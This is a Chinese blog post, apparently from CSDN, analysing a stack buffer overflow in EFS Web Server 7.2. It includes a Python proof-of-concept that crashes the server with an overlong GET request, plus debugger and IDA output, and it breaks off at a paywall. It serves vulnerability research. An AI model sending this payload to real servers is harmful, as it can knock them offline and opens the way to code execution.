EFS_Web_Server漏洞分析

最新推荐文章于 2025-06-17 20:26:58 发布
最新推荐文章于 2025-06-17 20:26:58 发布
阅读量1.7k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 二进制漏洞分析 文章标签: windows 漏洞 web服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kostart123/article/details/77924706

EFS Web Server 7.2漏洞分析

简介

EFS Web Server是一款web服务器软件,能快速的搭建web服务。它在接受GET请求时,由于没有有效的控制请求字符串的长度导致栈溢出。

分析环境

OS:                 Microsoft Windows 10 64bit 专业版
Software:           EFS Web Server 7.2
winDbg:             6.12.2.633
IDAPro:             6.8 绿色版
python:             python 2.7

漏洞分析

编写如下的脚本用作poc

# coding=utf-8
# fileName: poc.py
# usage: python poc.py ip payloadNums

import socket
import sys

RHOST = sys.argv[1]
RPORT = 80
payload = '\x41'*int(sys.argv[2])

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((RHOST,RPORT))
s.send('GET '+payload+' HTTP/1.0\r\n\r\n')
s.close()
print 'done.'

打开EFS,用windbg附加到该进程,然后执行poc,windbg遇到异常被断下

(9f0.4220): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000001 ecx=ffffffff edx=00b65fa4 esi=00b65f7c edi=00b65fa4
eip=61c277f6 esp=00b65ef8 ebp=00b65f10 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Users\gyh\Desktop\1\sqlite3.dll - 
sqlite3!sqlite3_errcode+0x8e:
61c277f6 81784c97a629a0  cmp     dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????

这里是因为eax+4ch处的内存没有开辟出来导致内存访问异常,而且eax=41414141这是畸形字符串的值,说明传入的payload已经覆盖了eax,下面进行堆栈回溯找到上层的函数调用去分析漏洞是如何触发的

0:007> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00b65f10 61c6286c 000011b8 00001194 02ef4724 sqlite3!sqlite3_errcode+0x8e
*** WARNING: Unable to verify checksum for C:\Users\gyh\Desktop\1\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Users\gyh\Desktop\1\fsws.exe
00b65f50 00496624 00000001 00000000 00b65f7c sqlite3!sqlite3_declare_vtab+0x3282
00b675f4 00000000 00000000 00b6755c 00b67570 fsws+0x96624

函数返回在61c6286c处,打开ida载入sqlite3.dll并跳转到该处

.text:61C6284E                 push    ebp
.text:61C6284F                 mov     ebp, esp
.text:61C62851                 push    edi
.text:61C62852                 push    esi
.text:61C62853                 push    ebx
.text:61C62854                 sub     esp, 2Ch
.text:61C62857                 mov     ebx, eax
.text:61C62859                 mov     edi, edx
.text:61C6285B                 mov     [ebp+var_1C], ecx
.text:61C6285E                 mov     esi, [ebp+arg_8]
.text:61C62861                 mov     dword ptr [esi], 0
.text:61C62867                 call    _sqlite3SafetyCheckOk
.text:61C6286C                 test    eax, eax         ;ret addr
.text:61C6286E                 jz      short loc_61C62874
.text:61C62870                 test    edi, edi

显然漏洞的触发位置就在_sqlite3SafetyCheckOk,直接跟进去F5

signed int __usercall sqlite3SafetyCheckOk@<eax>(int a1@<eax>)
{
  signed int v1; // ebx@2

  if ( a1 )
  {
    v1 = 1;
    if ( *(_DWORD *)(a1 + 76) != -1607883113 )
    {
      LOBYTE(v1) = 0;
      if ( sqlite3SafetyCheckSickOrOk() )
        sqlite3_log(21, "API call with %s database connection pointer", "unopened");
    }
  }
  else
  {
    sqlite3_log(21, "API call with %s database connection pointer", (unsigned int)"NULL");
    v1 = 0;
  }
  return v1;
}

这里的*(_DWORD *)(a1+76)就是漏洞触发位置的[eax+4ch],我们应该关注a1。这里的a1是上层函数传递进来的,回到上层函数F5

signed int __usercall sqlite3LockAndPrepare@<eax>(int a1@<eax>, int a2@<edx>, int a3, int a4, _DWORD *a5, int a6)
{
  int v6; // ebx@1
  int v7; // edi@1
  signed int v8; // edx@3
  signed int v9; // edx@4
  signed int v10; // ST18_4@6

  v6 = a1;
  v7 = a2;
  *a5 = 0;
  if ( sqlite3SafetyCheckOk(a1) && v7 )
  {
    sqlite3_mutex_enter(*(_DWORD *)(v6 + 12));
    sqlite3BtreeEnterAll();
    v9 = sqlite3Prepare(a3, a4, a5, a6);
    if ( v9 == 17 )
    {
      sqlite3_finalize(*a5);
      v9 = sqlite3Prepare(a3, a4, a5, a6);
    }
    v10 = v9;
    sqlite3BtreeLeaveAll();
    sqlite3_mutex_leave(*(_DWORD *)(v6 + 12));
    v8 = v10;
  }
  else
  {
    sqlite3_log(21, "misuse at line %d of [%.10s]", 105119, "9d6c1880fb75660bbabd693175579529785f8a6b");
    v8 = 21;
  }
  return v8;
}

该函数传递给sqlite3SafetyCheckOk的参数又是上层函数传递进来的第一个参数,所以继续查看00496624返回位置处的函数,这个地址是主程序fsws.exe的,所以再打开一个ida载入fsws.exe

.text:00496600                 push    ecx
.text:00496601                 mov
最低0.47元/天 解锁文章

200万优质内容无限畅学
传统后端漏洞----(Web Server) 解析漏洞
怡红群芳的博客
06-29 1206
这几天各种技术面试接踵而至,压得我喘不过气了!然后面试官问了我这个SSRF漏洞原理和利用方式以及防御手段,当然同时还问了好几个Top10漏洞
Easy File Sharing Web Server 7.2 - 'POST' 缓冲区溢出漏洞分析
giantbranch的专栏
07-26 2697
简介看到这个软件,之前不是GET请求缓冲区溢出吗? (附上我的分析链接:http://blog.youkuaiyun.com/u012763794/article/details/66970749)这次有个POST,看看有没有新鲜的东西啊!参考:https://www.exploit-db.com/exploits/42165/实验环境 WinXP sp3 中文版 EFS Web Server7.
【收藏】十大Webserver漏洞扫描工具
weixin_33978044的博客
08-15 363
如今有很多消息令我们感到Web的危急性,因此,当前怎样构建一个安全的Web环境成为网管员和安全管理员们义不容辞的责任。可是巧妇难为无米之炊,该选择哪些安全工具呢? 扫描程序能够在帮助造我们造就安全的Web网站上助一臂之力,也就是说在黑客“黑”你之前,先測试一下自己系统中的漏洞。我们在此推荐十大Web漏洞扫描程序,供您參考。 1. Nikto 这是一个开源的Webserver扫描程序,...
VWebAppServer 使用指南:基于 VLibuv 的录制服务实现(纯C++开发,类似软录像机,支持RTSP流)
最新发布
qq_41697882的博客
06-17 936
介绍一款基于VLibuv框架的VWebAppServer类实现的 轻量级C++流媒体录制管理系统,具备RTSP流管理、视频录制、日志控制等功能。系统采用纯C++实现,资源占用低(CPU接近0%,内存<10MB),提供RESTful API和Web界面。核心组件包括StreamerManager(流管理)、RecordingManager(录制控制)和Web服务器。通过API可添加RTSP源、启停录制任务,支持预录制和多线程优化。项目依赖VLibuv、JsonCpp和FFmpeg,编译简单,高效运行
web server安全概览--你都了解哪些服务器漏洞
m0_47253060的博客
05-09 335
web server安全 文章目录 web server安全 apache安全 相关漏洞复现 nginx安全 相关漏洞复现 IIS安全 相关漏洞复现 jBoss安全 相关漏洞复现 tomcat安全 相关漏洞复现 weblogic安全 相关漏洞复现 apache安全 前段时间呢,做了许多漏洞复现,就包括apache的解析漏洞和其他的不安全的配置导致的漏洞。 这些漏洞大部分都是module造成的,apache核心的高危漏洞几乎没有。 所以在检查apache是否安全时第一步 就是检查apache的modu.
常见的web服务器解析漏洞
qq_45705626的博客
02-01 693
在Apache 1.x和Apche 2.x中存在解析漏洞,但是它们与IIS解析漏洞不同,APache是从右到左开始判断解析,如果为不可识别解析,就再往左判断。是一个不存在的文件,此时会向前递归,将xx.jpg作为php文件解析,从而造成漏洞。作为一种破坏性极强的漏洞,但是微软并没有认识到他的严重性,现在这种漏洞还依然存在,我们也可以在靶机上复现。在II6.0下,分号后面的内容不会被解析,所以我们的xx.asp会被服务器当成ASP脚本执行。如:.php.rar.jpg.png.zip等。
fuzzing-03-Easy File Sharing Web Server7.2分析和利用
dhfttkl123的博客
07-11 2677
0x00前言 首先,为什么没有fuzzing-02。。。因为在写02的时候,发现还是重复第一篇的相关内容,写一半就停了,不过03是我第一次分析别人没分析过的软件,并且独立编写shellcode,所以记录一下留作自己的参考。 目标:win7 x64 sp1 源:win10(python) 软件:Easy File Sharing Web Server(7.2)、Windbg、Immunity
WEB环境下SQL Server数据库安全策略研究.pdf
09-19
2. 文件系统的安全策略:SQL Server应当安装在NTFS文件系统上,因为NTFS比FAT系统更加稳定,并且支持文件权限的精细设置,可以对文件、目录和文件加密(EFS)等进行详细配置,从而对数据库文件进行保护。 3. 密码的...
【愚公系列】2024年03月 《网络安全应急管理与技术实践》 021-网络安全应急技术与实践(主机层-Windows 检查演练)
热门推荐
时光隧道
02-14 9万+
网络安全Windows检查演练是指对Windows操作系统进行一系列测试和检查的过程,旨在评估系统的安全性、发现存在的安全漏洞和风险,并采取相应的措施加以修复和强化。该演练通常由安全专家或团队负责进行,其目的是确保系统的网络安全措施得到有效实施,以减少系统被攻击、数据泄露或服务中断的风险。在网络安全Windows检查演练中,安全专家会使用各种工具和技术,如漏洞扫描、强密码测试、网络流量监控等,对Windows操作系统进行全面的检查。
IoT设备常见Web Server漏洞挖掘思路分析:BOA篇,从零基础到精通,收藏这篇就够了!
Javachichi的博客
03-06 1242
简而言之,BOA是一个轻量级的HTTP服务器,主要设计用于嵌入式系统,以高效的性能和小巧的代码体积著称,通常被应用于资源受限的设备,例如路由器、智能家居或者其他的嵌入式环境。本文的主要贡献是从源码小结了BOA的状态机,结合经验和源码提出了快速恢复BOA请求结构体的方法,以及结合三个典型的BOA认证前漏洞,提供了对BOA进行漏洞挖掘的一般方法,文中给出了案例的固件下载链接,感兴趣的师傅可以尝试交流。在二次开发中,经常将鉴权相关的逻辑集成到这个函数中,因此很多师傅对BOA进行漏挖的时候会直接定位到这个函数。
DTcms内容管理系统 v6.0.zip
03-21
DTcms内容管理系统 v6.0.zip
Web漏洞】文件解析漏洞
Butterfly0011的博客
03-13 738
文章目录IIS解析漏洞目录解析漏洞(/test.asp/1.jpg)文件名解析漏洞(test.asp;.jpg)畸形解析漏洞(test.jpg/*.php)其他解析漏洞Ngnix解析漏洞畸形解析漏洞(test.jpg/*.php)%00空字节代码解析漏洞CVE-2013-4547(%20%00)Apache解析漏洞 文件解析漏洞主要由于网站管理员操作不当或者 Web 服务器自身的漏洞,导致一些特殊...
WinDbg+SOS:Web服务器CPU(100%)实例分析
axpbiledjpihry3234的博客
12-13 341
下午,msn上面一个朋友发了一个dump文件过来,说是Web服务器的CPU使用率在100%,找不到问题在什么地方,让帮忙看看,遂让把dump文件传过来,找找问题出在哪儿。 Framework2.0,Windows 2k的OS。 加载了Dump文件之后,接着加载2.0版本的SOS扩展调试模块: .load C:\WINDOWS\Microso...
常见web安全漏洞_web漏洞
xnxqwzy的博客
11-05 210
​ “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1483
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
EFS Web Server 7.2 GET请求缓冲区溢出漏洞分析与利用
giantbranch的专栏
03-28 3690
简介EFS Web Server是一个可以通过web端管理服务器文件的软件,发送GET请求长度过长会触发缓冲区溢出漏洞 分析来源:https://www.exploit-db.com/exploits/39008/实验环境 WinXP sp3 中文版 EFS Web Server7.2 immunity debugger windbg IDA mona 漏洞
Web中间件常见漏洞总结
分享Python知识
11-02 158
Web中间件常见漏洞总结
解决Windows自带NTFS加密(EFS)后打开文件乱码的问题
huzgd的专栏
05-29 7590
<br />之前我在一篇博文中说过,WINDOWS自带的NTFS加密(EFS)是最适合程序员的代码文件加密保护的方法。但我有个同事对我说,NTFS加密非常不可靠,加密后的内容经常是乱码,他已经试过几次,已经是怕了不敢再用了。然后他当着我的面在他的电脑上搞了个大文件夹,右键文件夹属性高级加密并应用到所有子文件,过了一会,他再打开几个加密文件,果然,有一些能正常打开,另外一些就是乱码了(只是乱码,文件可以打开,不是拒绝访问)。加密完成重启了系统后,基本上所有文件都是乱码了。<br />对此我也感觉很疑惑,难道微
efs_search:高效全格式大文件搜索工具
最后,压缩包子文件的文件名称列表中只列出“efs_search”,这可能意味着该搜索工具被打包在一个压缩文件中,并且文件名称即是工具的名称。 综合上述信息,文件搜索工具对于提高工作效率、管理文件系统以及快速定位...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值